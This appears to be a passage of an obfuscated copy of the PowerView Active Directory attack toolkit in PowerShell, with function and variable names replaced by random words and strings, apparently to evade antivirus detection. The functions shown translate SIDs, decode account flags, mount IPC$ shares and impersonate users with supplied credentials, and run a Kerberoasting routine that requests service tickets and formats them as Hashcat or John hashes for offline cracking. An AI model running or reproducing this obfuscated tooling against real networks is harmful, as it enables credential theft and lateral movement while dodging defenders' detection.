[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$RFXZSNQH99 = @{} | |
if ($PSBoundParameters['Domain']) { $RFXZSNQH99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Server']) { $RFXZSNQH99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['Credential']) { $RFXZSNQH99['Credential'] = $KWcDeQDF99 } | |
} | |
PROCESS { | |
ForEach ($CHKYAbAI99 in $DHIjlbmp99) { | |
$CHKYAbAI99 = $CHKYAbAI99.trim('*') | |
try { | |
Switch ($CHKYAbAI99) { | |
'S-1-0' { 'Null Authority' } | |
'S-1-0-0' { 'Nobody' } | |
'S-1-1' { 'World Authority' } | |
'S-1-1-0' { 'Everyone' } | |
'S-1-2' { 'Local Authority' } | |
'S-1-2-0' { 'Local' } | |
'S-1-2-1' { 'Console Logon ' } | |
'S-1-3' { 'Creator Authority' } | |
'S-1-3-0' { 'Creator Owner' } | |
'S-1-3-1' { 'Creator Group' } | |
'S-1-3-2' { 'Creator Owner Server' } | |
'S-1-3-3' { 'Creator Group Server' } | |
'S-1-3-4' { 'Owner Rights' } | |
'S-1-4' { 'Non-unique Authority' } | |
'S-1-5' { 'NT Authority' } | |
'S-1-5-1' { 'Dialup' } | |
'S-1-5-2' { 'Network' } | |
'S-1-5-3' { 'Batch' } | |
'S-1-5-4' { 'Interactive' } | |
'S-1-5-6' { 'Service' } | |
'S-1-5-7' { 'Anonymous' } | |
'S-1-5-8' { 'Proxy' } | |
'S-1-5-9' { 'Enterprise Domain Controllers' } | |
'S-1-5-10' { 'Principal Self' } | |
'S-1-5-11' { 'Authenticated Users' } | |
'S-1-5-12' { 'Restricted Code' } | |
'S-1-5-13' { 'Terminal Server Users' } | |
'S-1-5-14' { 'Remote Interactive Logon' } | |
'S-1-5-15' { 'This Organization ' } | |
'S-1-5-17' { 'This Organization ' } | |
'S-1-5-18' { 'Local System' } | |
'S-1-5-19' { 'NT Authority' } | |
'S-1-5-20' { 'NT Authority' } | |
'S-1-5-80-0' { 'All Services ' } | |
'S-1-5-32-544' { 'BUILTIN\Administrators' } | |
'S-1-5-32-545' { 'BUILTIN\Users' } | |
'S-1-5-32-546' { 'BUILTIN\Guests' } | |
'S-1-5-32-547' { 'BUILTIN\Power Users' } | |
'S-1-5-32-548' { 'BUILTIN\Account Operators' } | |
'S-1-5-32-549' { 'BUILTIN\Server Operators' } | |
'S-1-5-32-550' { 'BUILTIN\Print Operators' } | |
'S-1-5-32-551' { 'BUILTIN\Backup Operators' } | |
'S-1-5-32-552' { 'BUILTIN\Replicators' } | |
'S-1-5-32-554' { 'BUILTIN\Pre-Windows 2000 Compatible Access' } | |
'S-1-5-32-555' { 'BUILTIN\Remote Desktop Users' } | |
'S-1-5-32-556' { 'BUILTIN\Network Configuration Operators' } | |
'S-1-5-32-557' { 'BUILTIN\Incoming Forest Trust Builders' } | |
'S-1-5-32-558' { 'BUILTIN\Performance Monitor Users' } | |
'S-1-5-32-559' { 'BUILTIN\Performance Log Users' } | |
'S-1-5-32-560' { 'BUILTIN\Windows Authorization Access Group' } | |
'S-1-5-32-561' { 'BUILTIN\Terminal Server License Servers' } | |
'S-1-5-32-562' { 'BUILTIN\Distributed COM Users' } | |
'S-1-5-32-569' { 'BUILTIN\Cryptographic Operators' } | |
'S-1-5-32-573' { 'BUILTIN\Event Log Readers' } | |
'S-1-5-32-574' { 'BUILTIN\Certificate Service DCOM Access' } | |
'S-1-5-32-575' { 'BUILTIN\RDS Remote Access Servers' } | |
'S-1-5-32-576' { 'BUILTIN\RDS Endpoint Servers' } | |
'S-1-5-32-577' { 'BUILTIN\RDS Management Servers' } | |
'S-1-5-32-578' { 'BUILTIN\Hyper-V Administrators' } | |
'S-1-5-32-579' { 'BUILTIN\Access Control Assistance Operators' } | |
'S-1-5-32-580' { 'BUILTIN\Access Control Assistance Operators' } | |
Default { | |
plagiarist -mxWgOMSt99 $CHKYAbAI99 @ADNameArguments | |
} | |
} | |
} | |
catch { | |
Write-Verbose "[Malory] Error converting SID '$CHKYAbAI99' : $_" | |
} | |
} | |
} | |
} | |
function plagiarist { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] | |
[OutputType([String])] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('Name', 'ObjectName')] | |
[String[]] | |
$mxWgOMSt99, | |
[String] | |
[ValidateSet('DN', 'Canonical', 'NT4', 'Display', 'DomainSimple', 'EnterpriseSimple', 'GUID', 'Unknown', 'UPN', 'CanonicalEx', 'SPN')] | |
$sVUXjDxI99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$cOSRfxvz99 = @{ | |
'DN' = 1 # CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com | |
'Canonical' = 2 # fabrikam.com/Engineers/Phineas Flynn | |
'NT4' = 3 # fabrikam\pflynn | |
'Display' = 4 # pflynn | |
'DomainSimple' = 5 # pflynn@fabrikam.com | |
'EnterpriseSimple' = 6 # pflynn@fabrikam.com | |
'GUID' = 7 # {95ee9fff-3436-11d1-b2b0-d15ae3ac8436} | |
'Unknown' = 8 # unknown type - let the server do translation | |
'UPN' = 9 # pflynn@fabrikam.com | |
'CanonicalEx' = 10 # fabrikam.com/Users/Phineas Flynn | |
'SPN' = 11 # HTTP/kairomac.contoso.com | |
'SID' = 12 # S-1-5-21-12986231-600641547-709122288-57999 | |
} | |
function Invoke-Method([__ComObject] $Object, [String] $vjFnrNGz99, $tBGAqXwb99) { | |
$ySjxeOag99 = $Null | |
$ySjxeOag99 = $Object.GetType().InvokeMember($vjFnrNGz99, 'InvokeMethod', $NULL, $Object, $tBGAqXwb99) | |
Write-Output $ySjxeOag99 | |
} | |
function Get-Property([__ComObject] $Object, [String] $wEKMMYbU99) { | |
$Object.GetType().InvokeMember($wEKMMYbU99, 'GetProperty', $NULL, $Object, $NULL) | |
} | |
function Set-Property([__ComObject] $Object, [String] $wEKMMYbU99, $tBGAqXwb99) { | |
[Void] $Object.GetType().InvokeMember($wEKMMYbU99, 'SetProperty', $NULL, $Object, $tBGAqXwb99) | |
} | |
if ($PSBoundParameters['Server']) { | |
$caasQjyB99 = 2 | |
$keaxQvvr99 = $CbStbNZR99 | |
} | |
elseif ($PSBoundParameters['Domain']) { | |
$caasQjyB99 = 1 | |
$keaxQvvr99 = $ADDDGomQ99 | |
} | |
elseif ($PSBoundParameters['Credential']) { | |
$Cred = $KWcDeQDF99.GetNetworkCredential() | |
$caasQjyB99 = 1 | |
$keaxQvvr99 = $Cred.Domain | |
} | |
else { | |
$caasQjyB99 = 3 | |
$keaxQvvr99 = $Null | |
} | |
} | |
PROCESS { | |
ForEach ($OLwIZxWj99 in $mxWgOMSt99) { | |
if (-not $PSBoundParameters['OutputType']) { | |
if ($OLwIZxWj99 -match "^[A-Za-z]+\\[A-Za-z ]+") { | |
$yLisSlzo99 = $cOSRfxvz99['DomainSimple'] | |
} | |
else { | |
$yLisSlzo99 = $cOSRfxvz99['NT4'] | |
} | |
} | |
else { | |
$yLisSlzo99 = $cOSRfxvz99[$sVUXjDxI99] | |
} | |
$ataTAVKq99 = New-Object -ComObject NameTranslate | |
if ($PSBoundParameters['Credential']) { | |
try { | |
$Cred = $KWcDeQDF99.GetNetworkCredential() | |
Invoke-Method $ataTAVKq99 'InitEx' ( | |
$caasQjyB99, | |
$keaxQvvr99, | |
$Cred.UserName, | |
$Cred.Domain, | |
$Cred.Password | |
) | |
} | |
catch { | |
Write-Verbose "[plagiarist] Error initializing translation for '$mxWgOMSt99' using alternate credentials : $_" | |
} | |
} | |
else { | |
try { | |
$Null = Invoke-Method $ataTAVKq99 'Init' ( | |
$caasQjyB99, | |
$keaxQvvr99 | |
) | |
} | |
catch { | |
Write-Verbose "[plagiarist] Error initializing translation for '$mxWgOMSt99' : $_" | |
} | |
} | |
Set-Property $ataTAVKq99 'ChaseReferral' (0x60) | |
try { | |
$Null = Invoke-Method $ataTAVKq99 'Set' (8, $OLwIZxWj99) | |
Invoke-Method $ataTAVKq99 'Get' ($yLisSlzo99) | |
} | |
catch [System.Management.Automation.MethodInvocationException] { | |
Write-Verbose "[plagiarist] Error translating '$OLwIZxWj99' : $($_.Exception.InnerException.Message)" | |
} | |
} | |
} | |
} | |
function polyethylene { | |
[OutputType('System.Collections.Specialized.OrderedDictionary')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('UAC', 'useraccountcontrol')] | |
[Int] | |
$Value, | |
[Switch] | |
$cFlsdGtR99 | |
) | |
BEGIN { | |
$klnsVfIw99 = New-Object System.Collections.Specialized.OrderedDictionary | |
$klnsVfIw99.Add("SCRIPT", 1) | |
$klnsVfIw99.Add("ACCOUNTDISABLE", 2) | |
$klnsVfIw99.Add("HOMEDIR_REQUIRED", 8) | |
$klnsVfIw99.Add("LOCKOUT", 16) | |
$klnsVfIw99.Add("PASSWD_NOTREQD", 32) | |
$klnsVfIw99.Add("PASSWD_CANT_CHANGE", 64) | |
$klnsVfIw99.Add("ENCRYPTED_TEXT_PWD_ALLOWED", 128) | |
$klnsVfIw99.Add("TEMP_DUPLICATE_ACCOUNT", 256) | |
$klnsVfIw99.Add("NORMAL_ACCOUNT", 512) | |
$klnsVfIw99.Add("INTERDOMAIN_TRUST_ACCOUNT", 2048) | |
$klnsVfIw99.Add("WORKSTATION_TRUST_ACCOUNT", 4096) | |
$klnsVfIw99.Add("SERVER_TRUST_ACCOUNT", 8192) | |
$klnsVfIw99.Add("DONT_EXPIRE_PASSWORD", 65536) | |
$klnsVfIw99.Add("MNS_LOGON_ACCOUNT", 131072) | |
$klnsVfIw99.Add("SMARTCARD_REQUIRED", 262144) | |
$klnsVfIw99.Add("TRUSTED_FOR_DELEGATION", 524288) | |
$klnsVfIw99.Add("NOT_DELEGATED", 1048576) | |
$klnsVfIw99.Add("USE_DES_KEY_ONLY", 2097152) | |
$klnsVfIw99.Add("DONT_REQ_PREAUTH", 4194304) | |
$klnsVfIw99.Add("PASSWORD_EXPIRED", 8388608) | |
$klnsVfIw99.Add("TRUSTED_TO_AUTH_FOR_DELEGATION", 16777216) | |
$klnsVfIw99.Add("PARTIAL_SECRETS_ACCOUNT", 67108864) | |
} | |
PROCESS { | |
$DWBGPYGr99 = New-Object System.Collections.Specialized.OrderedDictionary | |
if ($cFlsdGtR99) { | |
ForEach ($nszuvJHF99 in $klnsVfIw99.GetEnumerator()) { | |
if ( ($Value -band $nszuvJHF99.Value) -eq $nszuvJHF99.Value) { | |
$DWBGPYGr99.Add($nszuvJHF99.Name, "$($nszuvJHF99.Value)+") | |
} | |
else { | |
$DWBGPYGr99.Add($nszuvJHF99.Name, "$($nszuvJHF99.Value)") | |
} | |
} | |
} | |
else { | |
ForEach ($nszuvJHF99 in $klnsVfIw99.GetEnumerator()) { | |
if ( ($Value -band $nszuvJHF99.Value) -eq $nszuvJHF99.Value) { | |
$DWBGPYGr99.Add($nszuvJHF99.Name, "$($nszuvJHF99.Value)") | |
} | |
} | |
} | |
$DWBGPYGr99 | |
} | |
} | |
function dejection { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, Mandatory = $True)] | |
[Alias('GroupName', 'GroupIdentity')] | |
[String] | |
$mxWgOMSt99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
Add-Type -AssemblyName System.DirectoryServices.AccountManagement | |
try { | |
if ($PSBoundParameters['Domain'] -or ($mxWgOMSt99 -match '.+\\.+')) { | |
if ($mxWgOMSt99 -match '.+\\.+') { | |
$WmzYmnhI99 = $mxWgOMSt99 | plagiarist -sVUXjDxI99 Canonical | |
if ($WmzYmnhI99) { | |
$iPfYZYXp99 = $WmzYmnhI99.SubString(0, $WmzYmnhI99.IndexOf('/')) | |
$mJOYNiug99 = $mxWgOMSt99.Split('\')[1] | |
Write-Verbose "[dejection] Binding to domain '$iPfYZYXp99'" | |
} | |
} | |
else { | |
$mJOYNiug99 = $mxWgOMSt99 | |
Write-Verbose "[dejection] Binding to domain '$ADDDGomQ99'" | |
$iPfYZYXp99 = $ADDDGomQ99 | |
} | |
if ($PSBoundParameters['Credential']) { | |
Write-Verbose '[dejection] Using alternate credentials' | |
$hrtTwEFj99 = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $iPfYZYXp99, $KWcDeQDF99.UserName, $KWcDeQDF99.GetNetworkCredential().Password) | |
} | |
else { | |
$hrtTwEFj99 = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $iPfYZYXp99) | |
} | |
} | |
else { | |
if ($PSBoundParameters['Credential']) { | |
Write-Verbose '[dejection] Using alternate credentials' | |
$PJSDbMQJ99 = aforethought | Select-Object -ExpandProperty Name | |
$hrtTwEFj99 = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain, $PJSDbMQJ99, $KWcDeQDF99.UserName, $KWcDeQDF99.GetNetworkCredential().Password) | |
} | |
else { | |
$hrtTwEFj99 = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain) | |
} | |
$mJOYNiug99 = $mxWgOMSt99 | |
} | |
$Out = New-Object PSObject | |
$Out | Add-Member Noteproperty 'Context' $hrtTwEFj99 | |
$Out | Add-Member Noteproperty 'Identity' $mJOYNiug99 | |
$Out | |
} | |
catch { | |
Write-Warning "[dejection] Error creating binding for object ('$mxWgOMSt99') context : $_" | |
} | |
} | |
function Andes { | |
[CmdletBinding(DefaultParameterSetName = 'ComputerName')] | |
Param( | |
[Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ComputerName', ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('HostName', 'dnshostname', 'name')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$MqGzGCsi99, | |
[Parameter(Position = 0, ParameterSetName = 'Path', Mandatory = $True)] | |
[ValidatePattern('\\\\.*\\.*')] | |
[String[]] | |
$Path, | |
[Parameter(Mandatory = $True)] | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 | |
) | |
BEGIN { | |
$sELHmyXX99 = [Activator]::CreateInstance($iNYrRcBh99) | |
$sELHmyXX99.dwType = 1 | |
} | |
PROCESS { | |
$Paths = @() | |
if ($PSBoundParameters['ComputerName']) { | |
ForEach ($UHggnsSG99 in $MqGzGCsi99) { | |
$UHggnsSG99 = $UHggnsSG99.Trim('\') | |
$Paths += ,"\\$UHggnsSG99\IPC$" | |
} | |
} | |
else { | |
$Paths += ,$Path | |
} | |
ForEach ($RtHoTVXK99 in $Paths) { | |
$sELHmyXX99.lpRemoteName = $RtHoTVXK99 | |
Write-Verbose "[Andes] Attempting to mount: $RtHoTVXK99" | |
$jdzRPRXs99 = $Mpr::WNetAddConnection2W($sELHmyXX99, $KWcDeQDF99.GetNetworkCredential().Password, $KWcDeQDF99.UserName, 4) | |
if ($jdzRPRXs99 -eq 0) { | |
Write-Verbose "$RtHoTVXK99 successfully mounted" | |
} | |
else { | |
Throw "[Andes] error mounting $RtHoTVXK99 : $(([ComponentModel.Win32Exception]$jdzRPRXs99).Message)" | |
} | |
} | |
} | |
} | |
function bauxite { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] | |
[CmdletBinding(DefaultParameterSetName = 'ComputerName')] | |
Param( | |
[Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ComputerName', ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('HostName', 'dnshostname', 'name')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$MqGzGCsi99, | |
[Parameter(Position = 0, ParameterSetName = 'Path', Mandatory = $True)] | |
[ValidatePattern('\\\\.*\\.*')] | |
[String[]] | |
$Path | |
) | |
PROCESS { | |
$Paths = @() | |
if ($PSBoundParameters['ComputerName']) { | |
ForEach ($UHggnsSG99 in $MqGzGCsi99) { | |
$UHggnsSG99 = $UHggnsSG99.Trim('\') | |
$Paths += ,"\\$UHggnsSG99\IPC$" | |
} | |
} | |
else { | |
$Paths += ,$Path | |
} | |
ForEach ($RtHoTVXK99 in $Paths) { | |
Write-Verbose "[bauxite] Attempting to unmount: $RtHoTVXK99" | |
$jdzRPRXs99 = $Mpr::WNetCancelConnection2($RtHoTVXK99, 0, $True) | |
if ($jdzRPRXs99 -eq 0) { | |
Write-Verbose "$RtHoTVXK99 successfully ummounted" | |
} | |
else { | |
Throw "[bauxite] error unmounting $RtHoTVXK99 : $(([ComponentModel.Win32Exception]$jdzRPRXs99).Message)" | |
} | |
} | |
} | |
} | |
function purveyed { | |
[OutputType([IntPtr])] | |
[CmdletBinding(DefaultParameterSetName = 'Credential')] | |
Param( | |
[Parameter(Mandatory = $True, ParameterSetName = 'Credential')] | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99, | |
[Parameter(Mandatory = $True, ParameterSetName = 'TokenHandle')] | |
[ValidateNotNull()] | |
[IntPtr] | |
$iLRvFQhH99, | |
[Switch] | |
$Quiet | |
) | |
if (([System.Threading.Thread]::CurrentThread.GetApartmentState() -ne 'STA') -and (-not $PSBoundParameters['Quiet'])) { | |
Write-Warning "[purveyed] powershell.exe is not currently in a single-threaded apartment state, token impersonation may not work." | |
} | |
if ($PSBoundParameters['TokenHandle']) { | |
$hrqNHsCf99 = $iLRvFQhH99 | |
} | |
else { | |
$hrqNHsCf99 = [IntPtr]::Zero | |
$BfNERJdS99 = $KWcDeQDF99.GetNetworkCredential() | |
$VeuSFWRJ99 = $BfNERJdS99.Domain | |
$bnjyYveg99 = $BfNERJdS99.UserName | |
Write-Warning "[purveyed] Executing LogonUser() with user: $($VeuSFWRJ99)\$($bnjyYveg99)" | |
$jdzRPRXs99 = $OTnzYMIG99::LogonUser($bnjyYveg99, $VeuSFWRJ99, $BfNERJdS99.Password, 9, 3, [ref]$hrqNHsCf99);$boIzopBu99 = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error(); | |
if (-not $jdzRPRXs99) { | |
throw "[purveyed] LogonUser() Error: $(([ComponentModel.Win32Exception] $boIzopBu99).Message)" | |
} | |
} | |
$jdzRPRXs99 = $OTnzYMIG99::ImpersonateLoggedOnUser($hrqNHsCf99) | |
if (-not $jdzRPRXs99) { | |
throw "[purveyed] ImpersonateLoggedOnUser() Error: $(([ComponentModel.Win32Exception] $boIzopBu99).Message)" | |
} | |
Write-Verbose "[purveyed] Alternate credentials successfully impersonated" | |
$hrqNHsCf99 | |
} | |
function sepal { | |
[CmdletBinding()] | |
Param( | |
[ValidateNotNull()] | |
[IntPtr] | |
$iLRvFQhH99 | |
) | |
if ($PSBoundParameters['TokenHandle']) { | |
Write-Warning "[sepal] Reverting token impersonation and closing LogonUser() token handle" | |
$jdzRPRXs99 = $Kernel32::CloseHandle($iLRvFQhH99) | |
} | |
$jdzRPRXs99 = $OTnzYMIG99::RevertToSelf();$boIzopBu99 = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error(); | |
if (-not $jdzRPRXs99) { | |
throw "[sepal] RevertToSelf() Error: $(([ComponentModel.Win32Exception] $boIzopBu99).Message)" | |
} | |
Write-Verbose "[sepal] Token impersonation successfully reverted" | |
} | |
function Ximenes { | |
[OutputType('PowerView.SPNTicket')] | |
[CmdletBinding(DefaultParameterSetName = 'RawSPN')] | |
Param ( | |
[Parameter(Position = 0, ParameterSetName = 'RawSPN', Mandatory = $True, ValueFromPipeline = $True)] | |
[ValidatePattern('.*/.*')] | |
[Alias('ServicePrincipalName')] | |
[String[]] | |
$SPN, | |
[Parameter(Position = 0, ParameterSetName = 'User', Mandatory = $True, ValueFromPipeline = $True)] | |
[ValidateScript({ $_.PSObject.TypeNames[0] -eq 'PowerView.User' })] | |
[Object[]] | |
$User, | |
[ValidateSet('John', 'Hashcat')] | |
[Alias('Format')] | |
[String] | |
$LJQwwRYL99 = 'Hashcat', | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$Null = [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | |
if ($PSBoundParameters['Credential']) { | |
$aiSfwOXj99 = purveyed -KWcDeQDF99 $KWcDeQDF99 | |
} | |
} | |
PROCESS { | |
if ($PSBoundParameters['User']) { | |
$BOGxsDDD99 = $User | |
} | |
else { | |
$BOGxsDDD99 = $SPN | |
} | |
ForEach ($Object in $BOGxsDDD99) { | |
if ($PSBoundParameters['User']) { | |
$wyrYhyJD99 = $Object.ServicePrincipalName | |
$XXulWBmN99 = $Object.SamAccountName | |
$mWEoYopz99 = $Object.DistinguishedName | |
} | |
else { | |
$wyrYhyJD99 = $Object | |
$XXulWBmN99 = 'UNKNOWN' | |
$mWEoYopz99 = 'UNKNOWN' | |
} | |
if ($wyrYhyJD99 -is [System.DirectoryServices.ResultPropertyValueCollection]) { | |
$wyrYhyJD99 = $wyrYhyJD99[0] | |
} | |
try { | |
$toYTvcai99 = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $wyrYhyJD99 | |
} | |
catch { | |
Write-Warning "[Ximenes] Error requesting ticket for SPN '$wyrYhyJD99' from user '$mWEoYopz99' : $_" | |
} | |
if ($toYTvcai99) { | |
$vrFTDtPG99 = $toYTvcai99.GetRequest() | |
} | |
if ($vrFTDtPG99) { | |
$Out = New-Object PSObject | |
$SqnFKUoT99 = [System.BitConverter]::ToString($vrFTDtPG99) -replace '-' | |
$Out | Add-Member Noteproperty 'SamAccountName' $XXulWBmN99 | |
$Out | Add-Member Noteproperty 'DistinguishedName' $mWEoYopz99 | |
$Out | Add-Member Noteproperty 'ServicePrincipalName' $toYTvcai99.ServicePrincipalName | |
if($SqnFKUoT99 -match 'a382....3082....A0030201(?<EtypeLen>..)A1.{1,4}.......A282(?<CipherTextLen>....)........(?<DataToEnd>.+)') { | |
$Etype = [Convert]::ToByte( $Matches.EtypeLen, 16 ) | |
$HPxNSaSH99 = [Convert]::ToUInt32($Matches.CipherTextLen, 16)-4 | |
$nnJpMQRF99 = $Matches.DataToEnd.Substring(0,$HPxNSaSH99*2) | |
if($Matches.DataToEnd.Substring($HPxNSaSH99*2, 4) -ne 'A482') { | |
Write-Warning "Error parsing ciphertext for the SPN $($toYTvcai99.ServicePrincipalName). Use the TicketByteHexStream field and extract the hash offline with Get-KerberoastHashFromAPReq" | |
$Hash = $null | |
$Out | Add-Member Noteproperty 'TicketByteHexStream' ([Bitconverter]::ToString($vrFTDtPG99).Replace('-','')) | |
} else { | |
$Hash = "$($nnJpMQRF99.Substring(0,32))`$$($nnJpMQRF99.Substring(32))" | |
$Out | Add-Member Noteproperty 'TicketByteHexStream' $null | |
} | |
} else { | |
Write-Warning "Unable to parse ticket structure for the SPN $($toYTvcai99.ServicePrincipalName). Use the TicketByteHexStream field and extract the hash offline with Get-KerberoastHashFromAPReq" | |
$Hash = $null | |
$Out | Add-Member Noteproperty 'TicketByteHexStream' ([Bitconverter]::ToString($vrFTDtPG99).Replace('-','')) | |
} | |
if($Hash) { | |
if ($LJQwwRYL99 -match 'John') { | |
$AoKgtRrW99 = "`$qZWDNylo99`$$($toYTvcai99.ServicePrincipalName):$Hash" | |
} | |
else { | |
if ($mWEoYopz99 -ne 'UNKNOWN') { | |
$VeuSFWRJ99 = $mWEoYopz99.SubString($mWEoYopz99.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' | |
} | |
else { | |
$VeuSFWRJ99 = 'UNKNOWN' | |
} | |
$AoKgtRrW99 = "`$qZWDNylo99`$$($Etype)`$*$XXulWBmN99`$$VeuSFWRJ99`$$($toYTvcai99.ServicePrincipalName)*`$$Hash" | |
} | |
$Out | Add-Member Noteproperty 'Hash' $AoKgtRrW99 | |
} | |
$Out.PSObject.TypeNames.Insert(0, 'PowerView.SPNTicket') | |
$Out | |
} | |
} | |
} | |
END { | |
if ($aiSfwOXj99) { | |
sepal -iLRvFQhH99 $aiSfwOXj99 | |
} | |
} | |
} | |
function Ramsay { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.SPNTicket')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] | |
[String[]] | |
$mxWgOMSt99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[ValidateSet('John', 'Hashcat')] | |
[Alias('Format')] | |
[String] | |
$LJQwwRYL99 = 'Hashcat', | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$hZyutCHb99 = @{ | |
'SPN' = $True | |
'Properties' = 'samaccountname,distinguishedname,serviceprincipalname' | |
} | |
if ($PSBoundParameters['Domain']) { $hZyutCHb99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['LDAPFilter']) { $hZyutCHb99['LDAPFilter'] = $hzaXgjDv99 } | |
if ($PSBoundParameters['SearchBase']) { $hZyutCHb99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $hZyutCHb99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $hZyutCHb99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $hZyutCHb99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $hZyutCHb99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $hZyutCHb99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $hZyutCHb99['Credential'] = $KWcDeQDF99 } | |
if ($PSBoundParameters['Credential']) { | |
$aiSfwOXj99 = purveyed -KWcDeQDF99 $KWcDeQDF99 | |
} | |
} | |
PROCESS { | |
if ($PSBoundParameters['Identity']) { $hZyutCHb99['Identity'] = $mxWgOMSt99 } | |
horseshoed @UserSearcherArguments | Where-Object {$_.samaccountname -ne 'krbtgt'} | Ximenes -LJQwwRYL99 $LJQwwRYL99 | |
} | |
END { | |
if ($aiSfwOXj99) { | |
sepal -iLRvFQhH99 $aiSfwOXj99 | |
} | |
} | |
} | |
function squalor { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.FileACL')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('FullName')] | |
[String[]] | |
$Path, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
function realistic { | |
[CmdletBinding()] | |
Param( | |
[Int] | |
$FSR | |
) | |
$AccessMask = @{ | |
[uint32]'0x80000000' = 'GenericRead' | |
[uint32]'0x40000000' = 'GenericWrite' | |
[uint32]'0x20000000' = 'GenericExecute' | |
[uint32]'0x10000000' = 'GenericAll' | |
[uint32]'0x02000000' = 'MaximumAllowed' | |
[uint32]'0x01000000' = 'AccessSystemSecurity' | |
[uint32]'0x00100000' = 'Synchronize' | |
[uint32]'0x00080000' = 'WriteOwner' | |
[uint32]'0x00040000' = 'WriteDAC' | |
[uint32]'0x00020000' = 'ReadControl' | |
[uint32]'0x00010000' = 'Delete' | |
[uint32]'0x00000100' = 'WriteAttributes' | |
[uint32]'0x00000080' = 'ReadAttributes' | |
